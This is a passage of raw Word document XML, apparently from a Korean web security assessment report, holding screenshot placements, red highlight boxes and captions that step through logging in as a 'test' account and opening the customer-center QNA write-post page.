                          <a:ext cx="4246129" cy="207819"/>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8709" id="직사각형 1951474652" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:96.05pt;margin-top:125.1pt;width:334.35pt;height:16.3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8fhgIAAN0EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdH+0aZtVN1XUKgip&#10;aiu1qGfHa2ct+Q/byabcyjsg8QZcOPBcqLwDY++mDYUTIgdnxvPn+eabPTndKok2zHlhdIOLgxwj&#10;pqlphV41+P3t4s0xRj4Q3RJpNGvwPfP4dPb61Ulva1aazsiWOQRJtK972+AuBFtnmacdU8QfGMs0&#10;GLlxigRQ3SprHekhu5JZmeeHWW9ca52hzHu4PR+MeJbyc85ouOLcs4Bkg+FtIZ0unct4ZrMTUq8c&#10;sZ2g4zPIP7xCEaGh6FOqcxIIWjvxRyolqDPe8HBAjcoM54Ky1AN0U+QvurnpiGWpFwDH2yeY/P9L&#10;Sy831w6JFmY3nRTVUXU4KTHSRMGsHr8+PH769uP7w88vn9GeGTDrra8h9MZeu1HzIEYAttyp+A+t&#10;oW3C+f4JZ7YNiMJlVVaHRTnFiIKtzI+Oi2kcRPYcbZ0Pb5lRKAoNdjDHBC/ZXPgwuO5cYjFtFkJK&#10;uCe11KiPzeQTGDclQCkuSQBRWWjS6xVGRK6AqzS4lNIbKdoYHqO9Wy3PpEMbAnxZLHL4jS/7zS3W&#10;Pie+G/ySaWCSEgHoLIVq8HEM3kVLHbOzRMixgwjhAFqUlqa9h0E4MzDUW7oQUOSC+HBNHFASuoE1&#10;C1dwcGmgRTNKGHXGffzbffQHpoAVox4oDu1/WBPHMJLvNHBoWlRV3ImkVJOjEhS3b1nuW/RanRlA&#10;pYCFtjSJ0T/IncidUXewjfNYFUxEU6g9AD0qZ2FYPdhnyubz5AZ7YEm40DeWxuQRpwjv7faOODvO&#10;PwBzLs1uHUj9ggaDb4zUZr4OhovEkWdcgVtRgR1KLBv3PS7pvp68nr9Ks18AAAD//wMAUEsDBBQA&#10;BgAIAAAAIQBiSxD93gAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqF1L&#10;tGmIUwESQiAOpcDdjbdJ1HgdxW4S/p7lBMeZfZqdKbaz78SIQ2wDGVguFAikKriWagOfH083GYiY&#10;LDnbBUID3xhhW15eFDZ3YaJ3HPepFhxCMbcGmpT6XMpYNehtXIQeiW/HMHibWA61dIOdONx3Uiu1&#10;kt62xB8a2+Njg9Vpf/YGduF0lN2X1q/rh2e9fvHZVI9vxlxfzfd3IBLO6Q+G3/pcHUrudAhnclF0&#10;rDd6yagBfas0CCayleIxB3YyvQFZFvL/hvIHAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA&#10;4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEA&#10;OP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA&#10;lmIfH4YCAADdBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAA&#10;ACEAYksQ/d4AAAALAQAADwAAAAAAAAAAAAAAAADgBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAE&#10;AAQA8wAAAOsFAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004136FC" w:rsidRPr="004136FC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004136FC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41492183" wp14:editId="7D4584B5">
            <wp:extent cx="4572000" cy="1946783"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15875"/>
            <wp:docPr id="1951474660" name="그림 195147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696" b="62790"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="19467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3C897D" w14:textId="7325750D" w:rsidR="00166D19" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="406" w:name="_Toc20909461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44</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004136FC">
        <w:t xml:space="preserve">“test” </w:t>
      </w:r>
      <w:r w:rsidR="004136FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>계정 권한 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="406"/>
    </w:p>
    <w:p w14:paraId="75738208" w14:textId="77777777" w:rsidR="00166D19" w:rsidRPr="00CB22A6" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B50763F" w14:textId="28165CF0" w:rsidR="00166D19" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251590656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04AB14A6" wp14:editId="6F0120B1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4621530</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>629285</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="374073" cy="207818"/>
                <wp:effectExtent l="0" t="0" r="26035" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474653" name="직사각형 1951474653"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="374073" cy="20781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2B0AF" id="직사각형 1951474653" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:363.9pt;margin-top:49.55pt;width:29.45pt;height:16.3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wjhQIAANwEAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdp0qSrbqqoVRBS&#10;1VZqUc8TrzdryX/YTjblVt4BiTfgwoHnQuUdGHs3bSicEDk4M54/zzff7MnpVkmy4c4Lo0s6OMgp&#10;4ZqZSuhVSd/fLt5MKfEBdAXSaF7Se+7p6ez1q5PWFnxoGiMr7ggm0b5obUmbEGyRZZ41XIE/MJZr&#10;NNbGKQioulVWOWgxu5LZMM+Psta4yjrDuPd4e94Z6Szlr2vOwlVdex6ILCm+LaTTpXMZz2x2AsXK&#10;gW0E658B//AKBUJj0adU5xCArJ34I5USzBlv6nDAjMpMXQvGUw/YzSB/0c1NA5anXhAcb59g8v8v&#10;LbvcXDsiKpzd8XgwmoyOxoeUaFA4q8evD4+fvv34/vDzy2eyZ0bMWusLDL2x167XPIoRgG3tVPzH&#10;1sg24Xz/hDPfBsLw8nAyyidYhqFpmE+mg2mcQ/YcbJ0Pb7lRJAoldTjGhC5sLnzoXHcusZY2CyEl&#10;3kMhNWljL/kYp80AGVVLCCgqiz16vaIE5AqpyoJLKb2RoorhMdq71fJMOrIBpMtikeOvf9lvbrH2&#10;Ofim80umjkhKBGSzFKqk0xi8i5Y6ZueJj30HEcEOsygtTXWPc3CmI6i3bCGwyAX4cA0OGYnd4JaF&#10;KzxqabBF00uUNMZ9/Nt99EeioJWSFhmO7X9Yg+OUyHcaKXQ8GI3iSiRlNJ4MUXH7luW+Ra/VmUFU&#10;BrjPliUx+ge5E2tn1B0u4zxWRRNohrU7oHvlLHSbh+vM+Hye3HANLIQLfWNZTB5xivDebu/A2X7+&#10;AYlzaXbbAMULGnS+MVKb+TqYWiSOPOOK3IoKrlBiWb/ucUf39eT1/FGa/QIAAP//AwBQSwMEFAAG&#10;AAgAAAAhAFxiCijfAAAACgEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyoEyPV&#10;aYhTARJCIA6lwN2N3SSqvY5iNwl/z3KC42qeZt5W28U7Ntkx9gEV5KsMmMUmmB5bBZ8fTzcFsJg0&#10;Gu0CWgXfNsK2vryodGnCjO922qeWUQnGUivoUhpKzmPTWa/jKgwWKTuG0etE59hyM+qZyr3jIsvW&#10;3OseaaHTg33sbHPan72CXTgdufsS4lU+PAv54ou5nd6Uur5a7u+AJbukPxh+9UkdanI6hDOayJwC&#10;KSSpJwWbTQ6MAFmsJbADkbd5Abyu+P8X6h8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA&#10;4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEA&#10;OP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA&#10;7pRsI4UCAADcBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAA&#10;ACEAXGIKKN8AAAAKAQAADwAAAAAAAAAAAAAAAADfBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAE&#10;AAQA8wAAAOsFAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00C9688D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B3347">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CF834A2" wp14:editId="195019C5">
            <wp:extent cx="4572000" cy="1806573"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="22860"/>
            <wp:docPr id="1951474661" name="그림 195147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81" b="30930"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1806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54D25" w14:textId="7A0AFED7" w:rsidR="00166D19" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="407" w:name="_Toc20909461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45</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001B3347">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="001B3347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="001B3347">
        <w:t>est”</w:t>
      </w:r>
      <w:r w:rsidR="00E9033F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B3347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>계정 로그인 후</w:t>
      </w:r>
      <w:r w:rsidR="001A4760">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001B3347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072A3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>메인에서</w:t>
      </w:r>
      <w:r w:rsidR="00072A3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B3347">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="001B3347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>고객센터</w:t>
      </w:r>
      <w:r w:rsidR="001B3347">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="001B3347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="407"/>
    </w:p>
    <w:p w14:paraId="79FD3A76" w14:textId="77777777" w:rsidR="00166D19" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B8BFA6" w14:textId="6EA7F67C" w:rsidR="00166D19" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251585536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F1EED96" wp14:editId="30F94A99">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4493260</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2403475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="590550" cy="209550"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474654" name="직사각형 1951474654"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="590550" cy="2095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6A22" id="직사각형 1951474654" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:353.8pt;margin-top:189.25pt;width:46.5pt;height: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8iggIAANwEAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdR0jarbqooURBS&#10;1VZqUc8TrzdryX/YTjblVt4BiTfgwoHnQuUdGHs3bSicEDk4M54/zzff7Nn5Tkmy5c4Lo0s6OMop&#10;4ZqZSuh1Sd/fLt+cUuID6Aqk0byk99zT8+nrV2etLfjQNEZW3BFMon3R2pI2IdgiyzxruAJ/ZCzX&#10;aKyNUxBQdeusctBidiWzYZ4fZ61xlXWGce/xdtEZ6TTlr2vOwlVdex6ILCm+LaTTpXMVz2x6BsXa&#10;gW0E658B//AKBUJj0adUCwhANk78kUoJ5ow3dThiRmWmrgXjqQfsZpC/6OamActTLwiOt08w+f+X&#10;ll1urx0RFc5uMh6MTkbH4xElGhTO6vHrw+Onbz++P/z88pkcmBGz1voCQ2/stes1j2IEYFc7Ff+x&#10;NbJLON8/4cx3gTC8HE/y8RinwdA0zCdRxizZc7B1PrzlRpEolNThGBO6sL3woXPdu8Ra2iyFlHgP&#10;hdSkjb3kKT8go2oJAUspiz16vaYE5BqpyoJLKb2RoorhMdq79WouHdkC0mW5zPHXv+w3t1h7Ab7p&#10;/JKpI5ISAdkshSrpaQzeR0sds/PEx76DiGCHWZRWprrHOTjTEdRbthRY5AJ8uAaHjES0cMvCFR61&#10;NNii6SVKGuM+/u0++iNR0EpJiwzH9j9swHFK5DuNFJoMRqO4EkkZjU+GqLhDy+rQojdqbhCVAe6z&#10;ZUmM/kHuxdoZdYfLOItV0QSaYe0O6F6Zh27zcJ0Zn82SG66BhXChbyyLySNOEd7b3R04288/IHEu&#10;zX4boHhBg843Rmoz2wRTi8SRZ1yRW1HBFUos69c97uihnryeP0rTXwAAAP//AwBQSwMEFAAGAAgA&#10;AAAhAPD6YWffAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPhDAQhe8m/odmTLy5BXS3BBk2&#10;amKMxoOueu/SLpClU0K7gP/e8aTHyfvy3jfldnG9mOwYOk8I6SoBYan2pqMG4fPj8SoHEaImo3tP&#10;FuHbBthW52elLoyf6d1Ou9gILqFQaIQ2xqGQMtStdTqs/GCJs4MfnY58jo00o5653PUyS5KNdLoj&#10;Xmj1YB9aWx93J4fw5o8H2X9l2Yu6f8rUs8vnZnpFvLxY7m5BRLvEPxh+9VkdKnba+xOZIHoElagN&#10;owjXKl+DYCLnPRB7hJs0XYOsSvn/h+oHAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEA&#10;ABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h&#10;/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAsXif&#10;IoICAADcBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA&#10;8PphZ98AAAALAQAADwAAAAAAAAAAAAAAAADcBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA&#10;8wAAAOgFAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00D76F80">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C16D0A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BAFAAD1" wp14:editId="66AF939D">
            <wp:extent cx="4572000" cy="2703106"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="21590"/>
            <wp:docPr id="1951474662" name="그림 195147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770" b="48373"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="27031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D03AC" w14:textId="0F1CB4AB" w:rsidR="00166D19" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="408" w:name="_Toc209094619"/>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46</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C16D0A">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C16D0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidR="00C16D0A">
        <w:t xml:space="preserve">NA” </w:t>
      </w:r>
      <w:r w:rsidR="00C16D0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="408"/>
    </w:p>
    <w:p w14:paraId="16A29217" w14:textId="60301014" w:rsidR="00166D19" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75CB3417" w14:textId="3CA7F340" w:rsidR="00166D19" w:rsidRDefault="00E40B17" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251600896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0B0E4F84" wp14:editId="78BEEB89">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5175250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1511358</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="349250" cy="208915"/>
                <wp:effectExtent l="0" t="0" r="12700" b="19685"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474665" name="직사각형 1951474665"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="349250" cy="20891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07F5" id="직사각형 1951474665" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:407.5pt;margin-top:119pt;width:27.5pt;height:16.4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QefhAIAANwEAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDchaZtVN1XUKgip&#10;aiO1qOeJ15u15D9sJ5tyK++A1DfgwoHnQuUdGHs3bSicEDk4M54/zzff7MnpVkmy4c4Lo0s6OMgp&#10;4ZqZSuhVST/czN8cU+ID6Aqk0bykd9zT0+nrVyetLfjQNEZW3BFMon3R2pI2IdgiyzxruAJ/YCzX&#10;aKyNUxBQdausctBidiWzYZ4fZq1xlXWGce/x9rwz0mnKX9echau69jwQWVJ8W0inS+cyntn0BIqV&#10;A9sI1j8D/uEVCoTGok+pziEAWTvxRyolmDPe1OGAGZWZuhaMpx6wm0H+opvrBixPvSA43j7B5P9f&#10;Wna5WTgiKpzdZDwYHY0OD8eUaFA4q8ev94+fv/34fv/z4QvZMyNmrfUFhl7bhes1j2IEYFs7Ff+x&#10;NbJNON894cy3gTC8fDuaDMc4DYamYX48GYzjHLLnYOt8eMeNIlEoqcMxJnRhc+FD57pzibW0mQsp&#10;8R4KqUkbe8lTfkBG1RICllIWe/R6RQnIFVKVBZdSeiNFFcNjtHer5Zl0ZANIl/k8x1//st/cYu1z&#10;8E3nl0wdkZQIyGYpVEmPY/AuWuqYnSc+9h1EBDvMorQ01R3OwZmOoN6yucAiF+DDAhwyEtHCLQtX&#10;eNTSYIumlyhpjPv0t/voj0RBKyUtMhzb/7gGxymR7zVSaDIYjeJKJGU0Phqi4vYty32LXqszg6gM&#10;cJ8tS2L0D3In1s6oW1zGWayKJtAMa3dA98pZ6DYP15nx2Sy54RpYCBf62rKYPOIU4b3Z3oKz/fwD&#10;EufS7LYBihc06HxjpDazdTC1SBx5xhW5FRVcocSyft3jju7ryev5ozT9BQAA//8DAFBLAwQUAAYA&#10;CAAAACEAO9sl+d8AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KhdI4gJ&#10;cSpAQgjEAQrc3dhNotrrKHaT8PcsJ7jN7o5m31SbJXg2uTH1ETWsVwKYwybaHlsNnx+PFwpYygat&#10;8RGdhm+XYFOfnlSmtHHGdzdtc8soBFNpNHQ5DyXnqelcMGkVB4d028cxmEzj2HI7mpnCg+dSiGse&#10;TI/0oTODe+hcc9geg4a3eNhz/yXlS3H/JIvnoOZ2etX6/Gy5uwWW3ZL/zPCLT+hQE9MuHtEm5jWo&#10;9RV1yRrkpSJBDlUIEjvaFOIGeF3x/x3qHwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADh&#10;AQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4&#10;/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCG&#10;7QefhAIAANwEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAA&#10;IQA72yX53wAAAAsBAAAPAAAAAAAAAAAAAAAAAN4EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQA&#10;BADzAAAA6gUAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BF5C1B2" wp14:editId="4F5EF07D">
            <wp:extent cx="4572000" cy="1819759"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
            <wp:docPr id="1951474664" name="그림 195147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800" r="1559" b="34369"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="18197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A8F61" w14:textId="65620B0B" w:rsidR="00124A73" w:rsidRDefault="00166D19" w:rsidP="00124A73">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="409" w:name="_Toc20909462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47</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E40B17">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00E40B17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>글쓰기</w:t>
      </w:r>
      <w:r w:rsidR="00E40B17">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00E40B17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="409"/>
    </w:p>
    <w:p w14:paraId="06BD5CC3" w14:textId="5FEB9914" w:rsidR="00124A73" w:rsidRDefault="00124A73" w:rsidP="00124A73">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435E6B33" w14:textId="5C0CD1B4" w:rsidR="00124A73" w:rsidRDefault="002767D4" w:rsidP="00124A73">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251651072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D379EDC" wp14:editId="083CBFDC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4039870</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>975995</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="121920" cy="162560"/>
                <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                <wp:wrapNone/>
                <wp:docPr id="19" name="직사각형 19"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="121920" cy="16256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68389" id="직사각형 19" o:spid="_x0000_s1026" 